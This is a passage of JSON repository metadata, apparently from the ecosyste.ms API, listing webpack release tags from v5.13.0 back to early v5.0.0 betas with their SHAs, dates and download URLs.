pack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.